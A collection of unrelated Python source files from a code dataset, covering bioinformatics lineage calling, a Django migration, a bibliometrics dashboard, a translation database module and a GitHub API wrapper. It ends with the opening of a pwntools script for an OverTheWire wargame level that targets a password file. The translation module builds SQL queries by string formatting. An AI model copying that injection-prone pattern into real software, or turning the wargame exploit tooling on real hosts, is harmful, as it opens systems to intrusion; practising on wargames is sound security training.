sublin = lineage[ind]
prevsub.append(sublin)
sublinn = prevsub[0]
print "SNP" + " " + position[ind] + " " + "suggests sub-lineage: " + lineage[ind]
if prevsub[0] != sublin:
discord += 1
else:
concord +=1
for i in range(0,len(prevsub)):
if len(sublinn) < len(prevsub[i]) :
sublinn = prevsub[i]
else:
lin = lineage[ind]
prevlin.append(lin)
print "SNP" + " " + position[ind] + " " + "suggests lineage: " + lineage[ind]
if prevlin[0] != lin:
discord1 += 1
else:
concord1 += 1
fh2.close()
fh3 = open(input3,'w')
print >> fh3, "Sample ID" + "\t" + "Lineage" + "\t" + "Lineage Name" + "\t" + "Sublineage"
split_first = ['NA']
if len(prevsub) > 0:
split_first = sublinn.split(".")
sublinneage = True
if len(prevlin) == 0:
if len(BOV) > 0:
print "Lineage: " + "BOV"
print >> fh3, input4 + "\t" + "BOV" + "\t" + "Bovis" + "\t" + "NA"
if len(BOV) == 0 or len(BOV_AFRI) == 0:
for i in range(0,len(prevsub)):
split_lin = prevsub[i].split(".")
if split_lin[0] != split_first[0]:
discordance = True
if split_lin[1] != split_first[1]:
discordance = True
if discordance:
print "no precise lineage inferred"
print >> fh3, "no precise lineage inferred"
sys.exit(1)
else:
if len(split_first) > 1:
print "Lineage: " + split_first[0] + " : " + tribes[int(split_first[0])]
print "Sub-lineage: " + sublinn
print >> fh3, input4 + "\t" + split_first[0] + "\t" + tribes[int(split_first[0])] + "\t" + sublinn
elif len(linfour) < 2:
print "Absence of SNP 931123 suggests lineage 4"
print "Lineage: " + "4" + " : " + "Euro-American"
if len(hrv37) > 2:
print >> fh3, input4 + "\t" + "4" + "\t" + "Euro American" + "\t" + "NA"
elif len(hrv37) < 2:
print "Absence of SNP 1759252 suggests sublineage 4.9"
print >> fh3, input4 + "\t" + "4" + "\t" + "Euro American" + "\t" + "4.9"
else:
print "No Informative SNPs detected"
print >> fh3, "No Informative SNPs detected"
else:
if len(prevlin) > 1:
for j in range(0,len(prevlin)):
if prevlin[0] != prevlin[j]:
discordance = True
if discordance == True:
print "no concordance between predicted lineage and sublineage(s)"
print >> fh3, "no concordance between predicted lineage and sublineage(s)"
sys.exit(1)
else:
if len(sublinn) < 1:
print "Lineage: " + prevlin[0] + " " + tribes[int(prevlin[0])]
print >> fh3, input4 + "\t" + prevlin[0] + "\t" + tribes[int(prevlin[0])] + "\t" + "NA"
elif len(sublinn) > 1:
for i in range(0,len(prevsub)):
split_lin = prevsub[i].split(".")
if split_lin[0] != prevlin[0] and split_lin[0] != 'BOV_AFRI':
discordance = True
if split_lin[0] != split_first[0]:
discordance = True
if discordance:
print "no precise lineage inferred"
print >> fh3, "no precise lineage inferred"
sys.exit(1)
else:
print "Lineage: " + prevlin[0] + " " + tribes[int(prevlin[0])]
if sublinn.startswith('BOV_A'):
print >> fh3, input4 + "\t" + prevlin[0] + "\t" + tribes[int(prevlin[0])] + "\t" + "NA"
else:
print "Sub-lineage: " + sublinn
print >> fh3, input4 + "\t" + prevlin[0] + "\t" + tribes[int(prevlin[0])] + "\t" + sublinn
|
StarcoderdataPython
|
3379590
|
<gh_stars>0
from floodsystem.stationdata import build_station_list
from floodsystem.geo import stations_within_radius
def run():
"""Requirements for Task 1C"""
r = 10
p = (52.2053, 0.1218)
stations = build_station_list()
stations = stations_within_radius(stations, p, r)
print(sorted([station.name for station in stations]))
if __name__ == "__main__":
print("*** Task 1C: CUED Part IA Flood Warning System ***")
run()
|
StarcoderdataPython
|
38438
|
# Generated by Django 4.0 on 2022-01-13 10:17
import uuid
import ckeditor_uploader.fields
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('funuser', '0004_alter_funuser_avatar'),
('auth', '0012_alter_user_first_name_max_length'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Fnotification',
fields=[
('id',
models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
serialize=False,
unique=True)),
('title',
models.CharField(
max_length=64,
verbose_name='Title')),
('content',
ckeditor_uploader.fields.RichTextUploadingField(
max_length=2048,
verbose_name='Content')),
('additional_files',
models.FileField(
help_text='If you have more than one file, please package them and upload them.',
upload_to='',
verbose_name='Additional files')),
('DOC',
models.DateTimeField(
auto_now_add=True,
verbose_name='Date of creating')),
('DOU',
models.DateTimeField(
auto_now=True,
verbose_name='Date of updating')),
('comment',
models.TextField(
max_length=128,
verbose_name='Comment')),
('groups',
models.ManyToManyField(
blank=True,
help_text='The groups this notification belongs to. all user of specific groups will receive notification. for all users if groups is null',
related_name='notification_set',
related_query_name='notification',
to='auth.Group',
verbose_name='groups')),
('poster',
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to='funuser.funuser',
verbose_name='Author')),
('readers',
models.ManyToManyField(
blank=True,
related_name='reader_set',
related_query_name='reader',
to=settings.AUTH_USER_MODEL,
verbose_name='Reader')),
],
options={
'verbose_name': 'Notification',
'verbose_name_plural': 'Notifications',
},
),
]
|
StarcoderdataPython
|
4830078
|
<gh_stars>1-10
import textwrap
import re
import ipywidgets as widgets
import matplotlib.pyplot as pyplot
import numpy as np
import pandas as pd
from pyvis.network import Network
import matplotlib
import networkx as nx
import techminer.core.dashboard as dash
from techminer.core import (
Dashboard,
Network,
TF_matrix,
add_counters_to_axis,
corpus_filter,
exclude_terms,
normalize_network,
sort_by_axis,
explode,
)
# from techminer.core.params import EXCLUDE_COLS
from techminer.core import cluster_table_to_list
from techminer.core.dashboard import fig_height, fig_width, max_items, min_occurrence
from techminer.plots import ChordDiagram
from techminer.plots import bubble_plot as bubble_plot_
from techminer.plots import counters_to_node_colors, counters_to_node_sizes
from techminer.plots import heatmap as heatmap_
from techminer.plots import (
ax_text_node_labels,
expand_ax_limits,
)
from techminer.plots import set_spines_invisible
from ipywidgets import GridspecLayout, Layout
from techminer.core.filter_records import filter_records
###############################################################################
##
## MODEL
##
###############################################################################
class Model:
def __init__(
self,
data,
top_n,
limit_to,
exclude,
years_range,
clusters=None,
cluster=None,
):
#
if years_range is not None:
initial_year, final_year = years_range
data = data[(data.Year >= initial_year) & (data.Year <= final_year)]
#
# Filter for cluster members
#
if clusters is not None and cluster is not None:
data = corpus_filter(data=data, clusters=clusters, cluster=cluster)
self.data = data
self.limit_to = limit_to
self.exclude = exclude
self.top_n = top_n
self.clusters = clusters
self.cluster = cluster
self.colormap = None
self.column = None
self.height = None
self.keyword_a = None
self.keyword_b = None
self.max_items = None
self.min_occ = None
self.normalization = None
self.width = None
def radial_diagram(self):
##
## Computes TF_matrix with occurrence >= min_occurrence
##
TF_matrix_ = TF_matrix(
data=self.data,
column=self.column,
scheme=None,
min_occurrence=self.min_occ,
)
##
## Exclude Terms
##
TF_matrix_ = exclude_terms(data=TF_matrix_, axis=1)
##
## Adds counters to axis
##
TF_matrix_ = add_counters_to_axis(
X=TF_matrix_, axis=1, data=self.data, column=self.column
)
##
## Selected Keywords
##
keyword_a = [
w
for w in TF_matrix_.columns.tolist()
if (" ".join(w.split(" ")[:-1]).lower() == self.keyword_a)
]
if len(keyword_a) > 0:
keyword_a = keyword_a[0]
else:
return widgets.HTML("<pre>Keyword A not found in TF matrix</pre>")
keyword_b = [
w
for w in TF_matrix_.columns.tolist()
if (" ".join(w.split(" ")[:-1]).lower() == self.keyword_b)
]
if len(keyword_b) > 0:
keyword_b = keyword_b[0]
else:
return widgets.HTML("<pre>Keyword B not found in TF matrix</pre>")
if keyword_a == keyword_b:
return widgets.HTML("<pre>Keywords must be different!!!</pre>")
##
## Co-occurrence matrix and association index
##
X = np.matmul(
TF_matrix_.transpose().values, TF_matrix_[[keyword_a, keyword_b]].values
)
X = pd.DataFrame(X, columns=[keyword_a, keyword_b], index=TF_matrix_.columns)
##
## Select occurrences > 0
##
X = X[X.sum(axis=1) > 0]
X = X[
X.index.map(lambda w: int(w.split(" ")[-1].split(":")[0])) >= self.min_occ
]
X = sort_by_axis(data=X, sort_by="Num_Documents", ascending=False, axis=0)
link_keyword_a_keyword_b = X.loc[keyword_a, keyword_b]
X = X.head(self.max_items)
max_width = X.max().max()
##
## Network plot
##
matplotlib.rc("font", size=11)
fig = pyplot.Figure(figsize=(self.width, self.height))
ax = fig.subplots()
cmap = pyplot.cm.get_cmap(self.colormap)
nodes = X.index.tolist()
if keyword_a not in nodes:
nodes.append(keyword_a)
if keyword_b not in nodes:
nodes.append(keyword_b)
node_sizes = counters_to_node_sizes(nodes)
node_colors = counters_to_node_colors(x=nodes, cmap=lambda w: w)
node_colors = [cmap(t) for t in node_colors]
G = nx.Graph()
G.add_nodes_from(nodes)
G.add_edge(keyword_a, keyword_b, width=link_keyword_a_keyword_b)
for i, w in zip(X.index, X[keyword_a]):
if i != keyword_a:
G.add_edge(i, keyword_a, width=w)
for i, w in zip(X.index, X[keyword_b]):
if i != keyword_b:
G.add_edge(i, keyword_b, width=w)
##
## Layout
##
pos = nx.spring_layout(G, weight=None)
##
## Draw network edges
##
for e in G.edges.data():
a, b, dict_ = e
edge = [(a, b)]
width = 1.0 + 5.0 * dict_["width"] / max_width
nx.draw_networkx_edges(
G,
pos=pos,
ax=ax,
edgelist=edge,
width=width,
edge_color="k",
node_size=1,
alpha=0.5,
)
##
## Draw network nodes
##
for i_node, _ in enumerate(nodes):
nx.draw_networkx_nodes(
G,
pos,
ax=ax,
nodelist=[nodes[i_node]],
node_size=node_sizes[i_node],
node_color=node_colors[i_node],
node_shape="o",
edgecolors="k",
linewidths=1,
alpha=0.8,
)
xlim = ax.get_xlim()
ylim = ax.get_ylim()
for i_node, label in enumerate(nodes):
x_point, y_point = pos[label]
ax.text(
x_point
+ 0.01 * (xlim[1] - xlim[0])
+ 0.001 * node_sizes[i_node] / 300 * (xlim[1] - xlim[0]),
y_point
- 0.01 * (ylim[1] - ylim[0])
- 0.001 * node_sizes[i_node] / 300 * (ylim[1] - ylim[0]),
s=label,
fontsize=10,
bbox=dict(
facecolor="w",
alpha=1.0,
edgecolor="gray",
boxstyle="round,pad=0.5",
),
horizontalalignment="left",
verticalalignment="top",
)
fig.set_tight_layout(True)
expand_ax_limits(ax)
set_spines_invisible(ax)
ax.set_aspect("equal")
ax.axis("off")
return fig
def concordances(self):
data = self.data.copy()
data["Global_Citations"] = data.Global_Citations.map(int)
data = data[
["Authors", "Historiograph_ID", "Abstract", "Global_Citations"]
].dropna()
data["Authors"] = data.Authors.map(lambda w: w.replace(";", ", "))
data["REF"] = (
data.Authors
+ ". "
+ data.Historiograph_ID
+ ". Times Cited: "
+ data.Global_Citations.map(str)
)
data = data[["REF", "Abstract", "Global_Citations"]]
data["Abstract"] = data.Abstract.map(lambda w: w.split(". "))
data = data.explode("Abstract")
contains_a = data.Abstract.map(lambda w: self.keyword_a.lower() in w.lower())
contains_b = data.Abstract.map(lambda w: self.keyword_b.lower() in w.lower())
data = data[contains_a & contains_b]
if len(data) == 0:
return widgets.HTML("<pre>No concordances found!</pre>")
data = data.groupby(["REF", "Global_Citations"], as_index=False).agg(
{"Abstract": list}
)
data["Abstract"] = data.Abstract.map(lambda w: ". <br><br>".join(w))
data["Abstract"] = data.Abstract.map(lambda w: w + ".")
data = data.sort_values(["Global_Citations", "REF"], ascending=[False, True])
data = data.head(50)
pattern = re.compile(self.keyword_a, re.IGNORECASE)
data["Abstract"] = data.Abstract.map(
lambda w: pattern.sub("<b>" + self.keyword_a.upper() + "</b>", w)
)
pattern = re.compile(self.keyword_b, re.IGNORECASE)
data["Abstract"] = data.Abstract.map(
lambda w: pattern.sub("<b>" + self.keyword_b.upper() + "</b>", w)
)
HTML = ""
for ref, phrase in zip(data.REF, data.Abstract):
HTML += "=" * 100 + "<br>"
HTML += ref + "<br><br>"
phrases = textwrap.wrap(phrase, 80)
for line in phrases:
HTML += line + "<br>"
HTML += "<br>"
return widgets.HTML("<pre>" + HTML + "</pre>")
###############################################################################
##
## DASHBOARD
##
###############################################################################
COLORMAPS = [
"Greys",
"Purples",
"Blues",
"Greens",
"Oranges",
"Reds",
"Pastel1",
"Pastel2",
"tab10",
"tab20",
"tab20b",
"tab20c",
]
class App(Dashboard, Model):
def __init__(
self,
):
data = filter_records(pd.read_csv("corpus.csv"))
Model.__init__(
self,
data=data,
top_n=None,
limit_to=None,
exclude=None,
years_range=None,
)
self.command_panel = [
dash.HTML("Display:", hr=False, margin="0px, 0px, 0px, 5px"),
dash.RadioButtons(
options=[
"Concordances",
"Radial Diagram",
],
description="",
),
dash.HTML("Keywords selection:"),
dash.Dropdown(
options=sorted(data.columns),
description="Column:",
),
dash.Dropdown(options=[], description="Keyword A:"),
dash.Dropdown(options=[], description="Keyword B:"),
dash.min_occurrence(),
dash.max_items(),
dash.HTML("Visualization:"),
dash.cmap(),
dash.fig_width(),
dash.fig_height(),
]
#
# interactive output function
#
widgets.interactive_output(
f=self.interactive_output,
controls={
"menu": self.command_panel[1],
"column": self.command_panel[3],
"keyword_a": self.command_panel[4],
"keyword_b": self.command_panel[5],
"min_occ": self.command_panel[6],
"max_items": self.command_panel[7],
"colormap": self.command_panel[9],
"width": self.command_panel[10],
"height": self.command_panel[11],
},
)
Dashboard.__init__(self)
self.interactive_output(
**{
"menu": self.command_panel[1].value,
"column": self.command_panel[3].value,
}
)
def interactive_output(self, **kwargs):
Dashboard.interactive_output(self, **kwargs)
#
# Populate Keywords with all terms
#
x = explode(self.data, self.column)
all_terms = pd.Series(x[self.column].unique())
all_terms = all_terms[all_terms.map(lambda w: not pd.isna(w))]
all_terms = all_terms.sort_values()
self.command_panel[4].options = all_terms
keywords_ = all_terms
if "Abstract" in self.data.columns:
##
## Selected keyword in the GUI
##
keyword_a = self.command_panel[4].value
##
## Keywords that appear in the same phrase
##
data = self.data.copy()
data = data[["Abstract"]]
data = data.dropna()
data["Abstract"] = data["Abstract"].map(lambda w: w.lower())
data["Abstract"] = data["Abstract"].map(lambda w: w.split(". "))
data = data.explode("Abstract")
##
## Extract phrases contain keyword_a
##
data = data[data.Abstract.map(lambda w: keyword_a in w)]
##
## Extract keywords
##
data["Abstract"] = data.Abstract.map(
lambda w: [k for k in keywords_ if k in w]
)
data = data.explode("Abstract")
all_terms = sorted(set(data.Abstract.tolist()))
self.command_panel[5].options = all_terms
else:
self.command_panel[5].options = keywords_
|
StarcoderdataPython
|
119111
|
import os
import sqlite3
import json
import datetime
from shutil import copyfile
from werkzeug._compat import iteritems, to_bytes, to_unicode
from jam.third_party.filelock import FileLock
import jam
LANG_FIELDS = ['id', 'f_name', 'f_language', 'f_country', 'f_abr', 'f_rtl']
LOCALE_FIELDS = [
'f_decimal_point', 'f_mon_decimal_point',
'f_mon_thousands_sep', 'f_currency_symbol', 'f_frac_digits', 'f_p_cs_precedes',
'f_n_cs_precedes', 'f_p_sep_by_space', 'f_n_sep_by_space', 'f_positive_sign',
'f_negative_sign', 'f_p_sign_posn', 'f_n_sign_posn', 'f_d_fmt', 'f_d_t_fmt'
]
FIELDS = LANG_FIELDS + LOCALE_FIELDS
def lang_con(task):
return sqlite3.connect(os.path.join(task.work_dir, 'langs.sqlite'))
def execute(task, sql, params=None):
result = None
con = lang_con(task)
try:
cursor = con.cursor()
if params:
cursor.execute(sql, params)
else:
cursor.execute(sql)
con.commit()
except Exception as e:
print(sql)
raise Exception(e)
finally:
con.close()
def select(task, sql):
result = None
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute(sql)
result = cursor.fetchall()
con.rollback()
except Exception as e:
print(sql)
raise Exception(e)
finally:
con.close()
return result
def copy_table(cursor, name):
cursor.execute('DROP TABLE IF EXISTS SYS_%s' % name)
cursor.execute("SELECT sql FROM LANGS.sqlite_master WHERE type='table' AND name='JAM_%s'" % name)
sql = cursor.fetchone()[0]
cursor.execute(sql.replace('JAM_%s' % name, 'SYS_%s' % name))
cursor.execute('INSERT INTO SYS_%s SELECT * FROM LANGS.JAM_%s' % (name, name))
def update_langs(task):
with task.lock('$langs'):
con = task.create_connection()
try:
cursor = con.cursor()
try:
cursor.execute('ALTER TABLE SYS_PARAMS ADD COLUMN F_JAM_VERSION TEXT')
except:
pass
cursor.execute('SELECT F_JAM_VERSION, F_LANGUAGE FROM SYS_PARAMS')
res = cursor.fetchall()
version = res[0][0]
language = res[0][1]
langs_path = os.path.join(task.work_dir, 'langs.sqlite')
if version != task.app.jam_version or not os.path.exists(langs_path):
# ~ task.log.info('Version changed!')
copyfile(os.path.join(os.path.dirname(jam.__file__), 'langs.sqlite'), langs_path)
os.chmod(os.path.join(task.work_dir, 'langs.sqlite'), 0o666)
cursor.execute('SELECT ID, F_NAME FROM SYS_LANGS')
langs = cursor.fetchall()
langs_list = []
langs_dict = {}
for l in langs:
langs_list.append(l[1])
langs_dict[l[1]] = l[0]
res = select(task, 'SELECT %s FROM JAM_LANGS ORDER BY ID' % ', '.join(FIELDS))
for r in res:
if langs_dict.get(r[1]):
del langs_dict[r[1]]
if not r[1] in langs_list:
fields = ['DELETED']
values = ['?']
field_values = [0]
for i, value in enumerate(r):
if i > 0:
fields.append(FIELDS[i])
values.append('?')
field_values.append(value)
sql = "INSERT INTO SYS_LANGS (%s) VALUES (%s)" % (','.join(fields), ','.join(values))
cursor.execute(sql, (field_values))
del_langs = list(langs_dict.values())
if len(del_langs):
if language in del_langs:
language = 1
sql = "DELETE FROM SYS_LANGS WHERE ID IN (%s)" % ','.join([str(d) for d in del_langs])
cursor.execute(sql)
if language is None:
language = 'NULL'
cursor.execute("UPDATE SYS_PARAMS SET F_JAM_VERSION='%s', F_LANGUAGE=%s" % (task.app.jam_version, language))
con.commit()
finally:
con.close()
def init_locale():
import locale
result = {}
try:
locale.setlocale(locale.LC_ALL, '')
loc = locale.localeconv()
for field in LOCALE_FIELDS:
setting = field[2:]
try:
result[field] = to_unicode(loc[setting], 'utf-8')
except:
result[field] = jam.common.DEFAULT_LOCALE[setting.upper()]
except:
pass
try:
result['f_d_fmt'] = locale.nl_langinfo(locale.D_FMT)
except:
result['f_d_fmt'] = '%Y-%m-%d'
result['f_d_t_fmt'] = '%s %s' % (result['f_d_fmt'], '%H:%M')
return result
def get_lang_dict(task, language):
res = select(task, '''
SELECT K.F_KEYWORD,
CASE WHEN TRIM(V1.F_VALUE) <> ''
THEN V1.F_VALUE
ELSE V2.F_VALUE
END
FROM JAM_LANG_KEYS AS K
LEFT OUTER JOIN JAM_LANG_VALUES AS V1 ON (K.ID = V1.F_KEY AND V1.F_LANG = %s)
LEFT OUTER JOIN JAM_LANG_VALUES AS V2 ON (K.ID = V2.F_KEY AND V2.F_LANG = %s)
''' % (language, 1))
result = {}
for key, value in res:
result[key] = value
return result
def get_locale_dict(task, language):
result = {}
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT %s FROM SYS_LANGS WHERE ID=%s' % (', '.join(LOCALE_FIELDS), language))
res = cursor.fetchall()
if len(res):
for i, field in enumerate(LOCALE_FIELDS):
result[field[2:].upper()] = res[0][i]
else:
raise Exception('Language with id %s is not found' % language)
con.rollback()
except:
result = jam.common.DEFAULT_LOCALE
finally:
con.close()
return result
def get_translation(task, lang1, lang2):
res = select(task, '''
SELECT K.ID, K.F_KEYWORD, V1.F_VALUE, V2.F_VALUE
FROM JAM_LANG_KEYS AS K
LEFT OUTER JOIN JAM_LANG_VALUES AS V1 ON (K.ID = V1.F_KEY AND V1.F_LANG = %s)
LEFT OUTER JOIN JAM_LANG_VALUES AS V2 ON (K.ID = V2.F_KEY AND V2.F_LANG = %s)
''' % (lang1, lang2))
return res
def add_lang(task, lang_id, language, country, name, abr, rtl, copy_lang):
con = lang_con(task)
try:
cursor = con.cursor()
locale = init_locale()
fields = []
values = []
field_values = []
for key, value in iteritems(locale):
fields.append(key)
values.append('?')
field_values.append(to_unicode(value, 'utf-8'))
cursor.execute("INSERT INTO JAM_LANGS (ID, F_LANGUAGE, F_COUNTRY, F_NAME, F_ABR, F_RTL, %s) VALUES (?,?,?,?,?,?,%s)" % (','.join(fields), ','.join(values)),
([lang_id, language, country, name, abr, rtl] + field_values))
if copy_lang:
cursor.execute('''
SELECT JAM_LANG_KEYS.ID, F_VALUE
FROM JAM_LANG_VALUES LEFT OUTER JOIN JAM_LANG_KEYS ON JAM_LANG_KEYS.ID = JAM_LANG_VALUES.F_KEY
WHERE F_LANG = %s
''' % copy_lang)
res = cursor.fetchall()
recs = []
for key_id, value in res:
recs.append((key_id, lang_id, value))
cursor.executemany("INSERT INTO JAM_LANG_VALUES(F_KEY, F_LANG, F_VALUE) VALUES (?,?,?)", recs)
con.commit()
langs = task.sys_langs.copy()
langs.set_where(id=lang_id)
langs.open()
if langs.record_count():
langs.edit()
for key, value in iteritems(locale):
langs.field_by_name(key).value = to_unicode(value, 'utf-8')
langs.post()
langs.apply()
finally:
con.close()
def save_lang_field(task, lang_id, field_name, value):
execute(task, 'UPDATE JAM_LANGS SET %s=? WHERE ID=%s' % (field_name, lang_id), (value,))
con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('UPDATE SYS_LANGS SET %s=? WHERE ID=%s' % (field_name, lang_id), (value,))
con.commit()
finally:
con.close()
if task.language == lang_id:
task.update_lang(lang_id)
def save_translation(task, lang_id, key_id, value):
res = select(task, 'SELECT ID FROM JAM_LANG_VALUES WHERE F_LANG=%s AND F_KEY=%s' % (lang_id, key_id))
if len(res):
execute(task, 'UPDATE JAM_LANG_VALUES SET F_VALUE=? WHERE ID=%s' % (res[0][0]), (value,))
else:
execute(task, 'INSERT INTO JAM_LANG_VALUES (F_LANG, F_KEY, F_VALUE) VALUES (?, ?, ?)', (lang_id, key_id, value))
def add_key(task, key):
result = ''
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute("SELECT ID FROM JAM_LANG_KEYS WHERE F_KEYWORD='%s'" % key)
res = cursor.fetchall()
if len(res):
result = 'Keyword exists'
else:
cursor.execute('INSERT INTO JAM_LANG_KEYS (F_KEYWORD) VALUES (?)', (key,))
con.commit()
finally:
con.close()
return result
def del_key(task, key_id):
result = False
con = lang_con(task)
try:
cursor = con.cursor()
cursor.execute("DELETE FROM JAM_LANG_VALUES WHERE F_KEY=%s" % key_id)
cursor.execute("DELETE FROM JAM_LANG_KEYS WHERE ID=%s" % key_id)
con.commit()
result = True
finally:
con.close()
return result
def get_dict(task, language):
res = select(task, '''
SELECT JAM_LANG_KEYS.F_KEYWORD, F_VALUE
FROM JAM_LANG_VALUES LEFT OUTER JOIN JAM_LANG_KEYS ON JAM_LANG_KEYS.ID = JAM_LANG_VALUES.F_KEY
WHERE F_LANG = %s
''' % language)
result = {}
for key, value in res:
result[key] = value
return result
def export_lang(task, lang_id, host):
names = FIELDS[1:]
lang = select(task, 'SELECT %s FROM JAM_LANGS WHERE ID=%s' % (', '.join(names), lang_id))
if len(lang):
language = {}
for i in range(len(lang[0])):
language[names[i]] = lang[0][i]
translation = get_dict(task, lang_id)
content = json.dumps({'language': language, 'translation': translation})
name = language['f_name'].replace(' ', '_')
file_name = '%s_%s.lang' % (name, datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"))
return {'file_name': file_name, 'content': content}
def import_lang(task, file_path):
error = ''
try:
with open(file_path, 'r') as f:
content = to_unicode(f.read(), 'utf-8')
content = json.loads(content)
language = content['language']
translation = content['translation']
con = lang_con(task)
sys_con = task.create_connection()
try:
cursor = con.cursor()
cursor.execute('SELECT ID FROM JAM_LANGS WHERE F_LANGUAGE=%s AND F_COUNTRY=%s' % (language['f_language'], language['f_country']))
res = cursor.fetchall()
if len(res):
lang_id = res[0][0]
fields = []
field_values = []
for key, value in iteritems(language):
fields.append('%s=?' % key)
field_values.append(value)
fields = ',' .join(fields)
cursor.execute("UPDATE JAM_LANGS SET %s WHERE ID=%s" % (fields, lang_id), field_values)
sys_cursor = sys_con.cursor()
sys_cursor.execute("UPDATE SYS_LANGS SET %s WHERE ID=%s" % (fields, lang_id), field_values)
sys_con.commit()
else:
fields = []
values = []
field_values = []
for key, value in iteritems(language):
fields.append(key)
field_values.append(value)
values.append('?')
cursor.execute('INSERT INTO JAM_LANGS (%s) VALUES (%s)' % (','.join(fields), ','.join(values)), field_values)
cursor.execute('SELECT ID FROM JAM_LANGS WHERE F_LANGUAGE=%s AND F_COUNTRY=%s' % (language['f_language'], language['f_country']))
res = cursor.fetchall()
lang_id = res[0][0]
fields.append('DELETED')
values.append('?')
field_values.append(0)
sys_cursor = sys_con.cursor()
sys_cursor.execute('INSERT INTO SYS_LANGS (%s) VALUES (%s)' % (','.join(fields), ','.join(values)), field_values)
sys_con.commit()
if lang_id:
cursor.execute('SELECT ID, F_KEYWORD FROM JAM_LANG_KEYS')
res = cursor.fetchall()
keys = {}
for r in res:
keys[r[1]] = r[0]
recs = []
for keyword, value in iteritems(translation):
key_id = keys.get(keyword)
if key_id:
cursor.execute('SELECT ID FROM JAM_LANG_VALUES WHERE F_LANG=%s AND F_KEY=%s' % (lang_id, key_id))
res = cursor.fetchall()
if len(res):
cursor.execute('UPDATE JAM_LANG_VALUES SET F_VALUE=? WHERE ID=%s' % (res[0][0]), (value,))
else:
cursor.execute('INSERT INTO JAM_LANG_VALUES (F_LANG, F_KEY, F_VALUE) VALUES (?, ?, ?)', (lang_id, key_id, value))
con.commit()
finally:
con.close()
sys_con.close()
except Exception as e:
print(e)
error = 'Can not import language'
|
StarcoderdataPython
|
3258378
|
<filename>github/methods/activity/events/list_network_repository_events.py
from github.scaffold import Scaffold
from github.types import Response
from github.utils import utils
class ListNetworkRepositoryEvents(Scaffold):
"""
List public events for a network of repositories
"""
def list_network_repository_events(
self,
*,
owner: str,
repo: str,
per_page: int = 100,
page: int = None,
) -> 'Response':
"""
List public events for a network of repositories
:param owner:
:param repo:
:param per_page:
Results per page (max "100")
Default: "30"
:param page:
Page number of the results to fetch.
Default: "1"
:return: 'Response'
"""
response = self.get_with_token(
url=f'https://api.github.com/networks/{owner}/{repo}/events',
params={
'per_page': per_page,
'page': page,
}
)
if response.status_code in (200, 304):
return Response._parse(
response=response,
success=True,
result=utils.parse_events(response.json()),
)
elif response.status_code in (301, 403, 404):
return Response._parse(
response=response,
success=False,
)
else:
return Response._parse(
response=response,
success=False,
)
|
StarcoderdataPython
|
76635
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Fuzz test for LlvmEnv.validate()."""
import numpy as np
import pytest
from compiler_gym.envs import LlvmEnv
from compiler_gym.errors import BenchmarkInitError
from tests.pytest_plugins.random_util import apply_random_trajectory
from tests.test_main import main
pytest_plugins = ["tests.pytest_plugins.llvm"]
# The uniform range for trajectory lengths.
RANDOM_TRAJECTORY_LENGTH_RANGE = (1, 50)
@pytest.mark.timeout(600)
def test_fuzz(env: LlvmEnv, reward_space: str):
"""This test produces a random trajectory, resets the environment, then
replays the trajectory and checks that it produces the same state.
"""
env.observation_space = "Autophase"
env.reward_space = reward_space
benchmark = env.datasets["generator://csmith-v0"].random_benchmark()
print(benchmark.uri) # For debugging in case of failure.
try:
env.reset(benchmark=benchmark)
except BenchmarkInitError:
return
trajectory = apply_random_trajectory(
env, random_trajectory_length_range=RANDOM_TRAJECTORY_LENGTH_RANGE
)
print(env.state) # For debugging in case of failure.
env.reset(benchmark=benchmark)
for i, (action, observation, reward, done) in enumerate(trajectory, start=1):
print(f"Replaying step {i}: {env.action_space.flags[action]}")
replay_observation, replay_reward, replay_done, info = env.step(action)
assert done == replay_done, info
np.testing.assert_array_almost_equal(observation, replay_observation)
np.testing.assert_almost_equal(reward, replay_reward)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
151052
|
#!/usr/bin/env python
import logging
import os
import sys
import argparse
from torch_scope import run
if __name__ == "__main__":
run()
|
StarcoderdataPython
|
1785882
|
<gh_stars>1-10
from typing import Optional
from uuid import uuid4
from pydantic import BaseModel
from ..context import Context
from ..entity import Entity
from ..event import Event
from ..event_metadata import EventPayloadMetadata, EventMetadata
class EventPayload(BaseModel):
type: str
properties: Optional[dict] = {}
options: Optional[dict] = {}
def to_event(self, metadata: EventPayloadMetadata, source: Entity, session: Optional[Entity], profile: Optional[Entity],
options: dict, profile_less: bool) -> Event:
meta = EventMetadata(**metadata.dict())
meta.profile_less = profile_less
return Event(id=str(uuid4()),
metadata=meta,
session=Entity(id=session.id) if session is not None else None,
profile=profile, # profile can be None when profile_less event.
type=self.type,
properties=self.properties,
source=source, # Entity
context=Context(config=options, params={})
)
|
StarcoderdataPython
|
52480
|
<filename>stdnet/orm/mapper.py
import copy
from stdnet import getdb
from query import Manager, UnregisteredManager
def clearall():
for meta in _registry.values():
meta.cursor.clear()
def register(model, backend = None, keyprefix = None, timeout = 0):
'''Register a :class:`stdnet.rom.StdNet` model with a backend data server.'''
global _registry
from stdnet.conf import settings
backend = backend or settings.DEFAULT_BACKEND
prefix = keyprefix or model._meta.keyprefix or settings.DEFAULT_KEYPREFIX or ''
if prefix:
prefix = '%s:' % prefix
meta = model._meta
meta.keyprefix = prefix
meta.timeout = timeout or 0
objects = getattr(model,'objects',None)
if objects is None or isinstance(objects,UnregisteredManager):
objects = Manager()
else:
objects = copy.copy(objects)
model.objects = objects
meta.cursor = getdb(backend)
objects.model = model
objects._meta = meta
objects.cursor = meta.cursor
_registry[model] = meta
return meta.cursor.name
def unregister(model):
global _registry
_registry.pop(model,None)
model._meta.cursor = None
_registry = {}
|
StarcoderdataPython
|
122659
|
#!/usr/bin/env python2
from pwn import *
import time
level = 1
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/<PASSWORD>%i' % (level+1)
binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
r = shell.run(binary)
